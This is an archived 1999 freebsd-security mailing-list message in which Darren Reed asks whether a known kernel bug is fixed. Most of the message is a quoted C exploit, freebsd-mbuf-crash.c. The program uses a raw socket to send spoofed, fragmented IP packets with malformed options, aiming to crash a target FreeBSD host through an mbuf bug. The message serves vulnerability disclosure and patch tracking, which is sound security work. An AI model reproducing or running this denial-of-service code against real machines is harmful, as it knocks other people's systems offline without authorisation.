From owner-freebsd-security  Tue May  4  8:52:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24])
	by hub.freebsd.org (Postfix) with ESMTP id 4D2FD14FBD
	for <freebsd-security@freebsd.org>; Tue,  4 May 1999 08:52:28 -0700 (PDT)
	(envelope-from avalon@cheops.anu.edu.au)
Received: (from avalon@localhost)
	by cheops.anu.edu.au (8.9.1/8.9.1) id BAA29421
	for freebsd-security@freebsd.org; Wed, 5 May 1999 01:26:39 +1000 (EST)
From: Darren Reed <avalon@coombs.anu.edu.au>
Message-Id: <199905041526.BAA29421@cheops.anu.edu.au>
Subject: freebsd mbuf crash
To: freebsd-security@freebsd.org
Date: Wed, 5 May 1999 01:26:38 +1000 (EST)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


is this one (below) taken care of ?  perhaps a derivitice of this ?

darren

/* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. 
 * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <strings.h>


u_long htona(char *host)
{
        u_long  addr;
        struct  hostent *hp;

        if ((addr=inet_addr(host)) == INADDR_NONE) {
                if ((hp = gethostbyname(host)) == NULL)
                        return(-1);
                bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
        }       
        return(addr);
}

int main(int argc, char* argv[])
{
        char    buf[128];
        struct  ip *iph = (struct ip *)buf;     
        u_char  *ipoptions = (u_char *)(buf + sizeof(struct ip));
        struct  tcphdr *tcph = (struct tcphdr *)(buf + 60);
        int     s, i;
        struct  sockaddr_in sin;

        if (argc != 2) {
                printf("usage\n\t%s <host>\n", argv[0]);
                exit(1);
        }
        s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (s < 0) {
                perror("socket");
                exit(1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(7);
        sin.sin_addr.s_addr = htona(argv[1]);
        if (sin.sin_addr.s_addr == -1) {
                printf("Error resolving %s\n", argv[1]);
                exit(1);
        }

        bzero(buf, sizeof(buf));
        iph->ip_hl=15;
        iph->ip_v=4;
        iph->ip_len=htons(124);
        iph->ip_id= htons(getpid());
        iph->ip_off= htons(IP_MF);
        iph->ip_ttl = 255;
        iph->ip_p = IPPROTO_TCP;
        bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
        iph->ip_src.s_addr = htona("10.2.3.4");
        for (i = 0; i < 20;i++) {
                ipoptions[i]=0xff;
        }
        ipoptions[0] = 0xff; /* Made up option */  
        ipoptions[1] = 0x1a;
        memset((char *)&ipoptions[2], 0xff, 37);
        ipoptions[39] = 1;  /* IP_NOP */
        tcph->th_sport = htons(5505);
        tcph->th_dport = htons(23);
        tcph->th_seq = htonl(0xabcde123);
        tcph->th_ack = htonl(0x321edcba);
        tcph->th_flags = TH_ACK | TH_PUSH;
        tcph->th_win = htons(0x1234);

        if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
                perror("sendto");
                exit(1);
        }
        if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {   
                perror("sendto");
                exit(1);
        }
        iph->ip_len = htons(80);
        iph->ip_off = htons(8);
        if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
                perror("sendto");
                exit(1);
        }
        exit(0);
}



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message